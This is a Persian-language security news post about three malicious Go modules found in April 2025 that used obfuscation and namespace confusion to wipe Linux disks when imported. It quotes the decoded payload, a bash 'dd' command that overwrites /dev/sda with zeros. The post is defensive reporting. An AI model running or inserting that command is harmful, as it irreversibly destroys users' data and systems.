محققان امنیتی از ظهور یک حمله خطرناک به زنجیره تأمین در اکوسیستم زبان برنامه‌نویسی Go خبر داده‌اند که با استفاده از ماژول‌های مخرب، بدافزارهایی را برای پاک‌سازی کامل دیسک به سیستم‌ها تزریق می‌کند.

🔍 شرح ماجرا:
در آوریل ۲۰۲۵، تیم امنیتی Socket.dev سه ماژول مخرب در GitHub شناسایی کرد:

  • github[.]com/truthfulpharm/prototransform

  • github[.]com/blankloggia/go-mcp

  • github[.]com/steelpoor/tlsproxy

این ماژول‌ها با استفاده از تکنیک‌های obfuscation (پنهان‌سازی کد) هدف خود را مخفی می‌کردند و هنگام ایمپورت شدن در پروژه، به‌طور خودکار کد اجرایی خود را فعال می‌کردند. این حمله بر اساس Namespace Confusion طراحی شده است، جایی که نام ماژول‌ها به‌گونه‌ای انتخاب شده‌اند که با ماژول‌های معتبر شباهت داشته باشند تا توسعه‌دهندگان به‌اشتباه آن‌ها را انتخاب کنند.

💣 مکانیسم حمله:
کد مخرب به‌صورت رشته‌های تکه‌تکه پنهان شده و سپس در زمان اجرا به‌شکل زیر سرهم‌بندی و اجرا می‌شود:

#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync

این دستور ساده ولی مرگبار، تمام اطلاعات موجود روی دیسک /dev/sda را با صفر بازنویسی می‌کند و باعث نابودی کامل فایل‌ها، سیستم عامل، و داده‌های کاربر می‌شود. این بدافزار به‌صورت خاص سیستم‌عامل لینوکس را هدف قرار می‌دهد.

📉 پیامدها:

  • نابودی غیرقابل‌بازگشت داده‌ها

  • ازکارافتادگی سیستم‌ها و زیرساخت

  • خسارات چند میلیون دلاری برای سازمان‌های قربانی


دوست داشتید؟ لطفا با دوستان خود به اشتراک بگذارید.

1

یک نظر

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *